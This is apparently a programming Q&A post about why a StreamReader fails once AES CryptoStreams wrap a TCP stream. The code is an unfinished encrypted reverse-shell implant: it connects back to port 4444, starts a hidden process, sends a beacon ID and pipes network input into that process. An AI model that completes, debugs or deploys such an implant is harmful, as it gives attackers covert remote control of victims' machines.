# The streamwriter keep allocating the stream after adding cryptostream C#

Tags: c#

before adding cryptostream it was working fine but after adding cryptostream the streamreader is not working

```
namespace ConnectBack
{
    public class Program
    {

        static byte[] IV = IV;
        static byte[] Key = KEY ;
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using (Aes aesAlg = Aes.Create())
            {
                aesAlg.Key = Key;
                aesAlg.IV = IV;
                ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
                try
                {
                    using (TcpClient client = new TcpClient("127.0.0.1", 4444))
                    {
                        using (Stream stream = client.GetStream())
                        using (CryptoStream csDecrypt = new CryptoStream(stream, decryptor, CryptoStreamMode.Read))
                        using (CryptoStream csEncrypt = new CryptoStream(stream, encryptor, CryptoStreamMode.Write))
                        {
                            using (StreamReader rdr = new StreamReader(csDecrypt))
                            {
                                streamWriter = new StreamWriter(csEncrypt);

                                StringBuilder strInput = new StringBuilder();

                                Process p = new Process();
                                p.StartInfo.FileName = "sort.exe";
                                p.StartInfo.CreateNoWindow = true;
                                p.StartInfo.UseShellExecute = false;
                                p.StartInfo.RedirectStandardOutput = true;
                                p.StartInfo.RedirectStandardInput = true;
                                p.StartInfo.RedirectStandardError = true;
                                p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                                p.Start();
                                p.BeginOutputReadLine();
                                Guid ID = Guid.NewGuid();
                                streamWriter.WriteLine(ID + "|linux");
                                streamWriter.Flush();
                                csEncrypt.FlushFinalBlock();
                                while (true)
                                {
                                    strInput.Append(rdr.ReadToEnd());
                                    //strInput.Append("\n");
                                    p.StandardInput.WriteLine(strInput);
                                    strInput.Remove(0, strInput.Length);
                                }
                            }
```

i am asking if i can work under same intial stream and use stream reader without problem ?
i've read the documentation but it appears that the can us esame stream

Comment: Do you get an exception? Can you update your question and include the stack trace please.

Comment: A description of *"is not working"* doesn't provide us with much insight into your issue. What code was working? What code did you add that moved it into *not working*? What does *not working* mean here?